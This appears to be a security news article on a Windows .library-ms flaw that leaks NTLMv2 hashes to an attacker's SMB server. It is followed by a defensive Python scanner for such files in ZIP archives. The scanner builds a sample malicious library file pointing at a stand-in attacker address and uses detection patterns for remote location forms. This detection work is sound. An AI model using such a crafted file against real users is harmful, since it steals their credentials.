Security researchers have released a proof-of-concept exploit for this high-severity flaw, which Microsoft patched in its March 2025 Patch Tuesday updates on March 11.

The .library-ms file format, which is XML-based and trusted by Windows Explorer to define library locations, includes a <simpleLocation> tag that points to an attacker-controlled SMB server, said a security researcher using the alias "0x6rss". When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata. That parsing triggers an NTLM authentication handshake from the victim's system to the attacker's server, leaking the victim's NTLMv2 hash without any further user interaction.

0x6rss published the proof-of-concept exploit on GitHub on March 16, 2025. A threat actor known as "Krypt0n," reportedly the developer of the "EncryptHub Stealer" malware, allegedly offered the exploit for sale on underground forums before the public release.

This vulnerability adds to a growing list of NTLM-related flaws in Microsoft products; researchers previously identified similar credential-leaking issues in Microsoft Access, Publisher, and other applications.

Security experts recommend keeping all Microsoft products updated and adding protections against NTLM relay attacks, such as enabling SMB signing and disabling NTLM where possible.
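The mechanism above comes down to one field: a <simpleLocation>/<url> inside a .library-ms file that names a host the victim's machine will authenticate to. The scanner below is an added example written for this article; it is not code from the article, from 0x6rss's proof of concept, or from Microsoft. It parses .library-ms XML (the element layout and the http://schemas.microsoft.com/windows/2009/library namespace follow Microsoft's Library Description schema, but matching is done on local tag names so unnamespaced files are handled too) and flags any location URL that resolves to a remote host. It generalizes past the plain \\host\share case the article describes to the \\?\UNC\host form, WebDAV-style \\host@SSL@443 names, and file:// and smb:// URLs. It can also walk a ZIP before extraction, which is the moment Explorer would otherwise parse the file. The two sample library files and the archive are constructed for the demo; the 203.0.113.10 address is a documentation (TEST-NET-3) address standing in for an attacker's server, not a real indicator.

```python
"""Added example: scan .library-ms files (loose or inside a ZIP) for
<simpleLocation>/<url> entries that point at a remote host. Not code from the
article or from the published proof of concept; sample files are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional

# Location forms that name a host. Order matters: the \\?\UNC\ form must be
# tried before the plain \\host\ form, which rejects '?' as a host character.
HOST_PATTERNS = (
    re.compile(r"^\\\\\?\\UNC\\([^\\/]+)", re.IGNORECASE),   # \\?\UNC\host\share
    re.compile(r"^\\\\([^\\/?]+)", re.IGNORECASE),           # \\host\share
    re.compile(r"^(?:file|smb)://([^/]+)", re.IGNORECASE),   # file://host/share
)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


@dataclass
class Finding:
    url: str
    host: str


def _local_name(tag: str) -> str:
    """Drop the XML namespace so matching works with or without an xmlns."""
    return tag.rsplit("}", 1)[-1]


def remote_host(url: str) -> Optional[str]:
    """Return the host a library location would make the client contact, or None."""
    for pattern in HOST_PATTERNS:
        m = pattern.match(url.strip())
        if m:
            # \\host@SSL@443\share (WebDAV) still names 'host' before the first '@'.
            host = m.group(1).split("@", 1)[0].lower()
            return None if host in LOCAL_HOSTS else host
    return None  # knownfolder:{GUID}, drive paths, shell: URLs, etc.


def scan_library_ms(xml_text: str) -> List[Finding]:
    """Collect every simpleLocation/url in a library file that targets a remote host."""
    root = ET.fromstring(xml_text)
    findings: List[Finding] = []
    for loc in root.iter():
        if _local_name(loc.tag) != "simpleLocation":
            continue
        for child in loc.iter():
            if _local_name(child.tag) == "url" and child.text:
                host = remote_host(child.text)
                if host:
                    findings.append(Finding(child.text.strip(), host))
    return findings


def scan_archive(zip_bytes: bytes) -> Dict[str, List[Finding]]:
    """Scan each .library-ms member of a ZIP without extracting it to disk."""
    results: Dict[str, List[Finding]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            try:
                results[name] = scan_library_ms(zf.read(name).decode("utf-8-sig"))
            except ET.ParseError:
                results[name] = []  # not well-formed XML, so not a parseable library
    return results


# Constructed samples (assumption: layout per Microsoft's library schema).
BENIGN_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
# Same file with the location swapped for a UNC path to a TEST-NET-3 address.
MALICIOUS_LIBRARY_MS = BENIGN_LIBRARY_MS.replace(
    "knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}", r"\\203.0.113.10\share"
)


def build_sample_archive() -> bytes:
    """Build an in-memory ZIP mixing a benign and a malicious library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Documents.library-ms", BENIGN_LIBRARY_MS)
        zf.writestr("docs/Invoice.library-ms", MALICIOUS_LIBRARY_MS)
        zf.writestr("docs/readme.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_archive(build_sample_archive()).items():
        print(("SUSPICIOUS" if hits else "ok        ") + " " + member)
        for f in hits:
            print("    -> " + f.url + " (host " + f.host + ")")
```

Running the block prints one line per library file in the sample ZIP, marking Invoice.library-ms as suspicious because its location resolves to 203.0.113.10. Treat any remote host in a library location as a finding regardless of protocol: the point of the flaw is that Explorer contacts the host on the victim's behalf, so SMB, WebDAV and file:// targets all deserve the same scrutiny.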
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 19 Mar 2025 09:00:04 +0000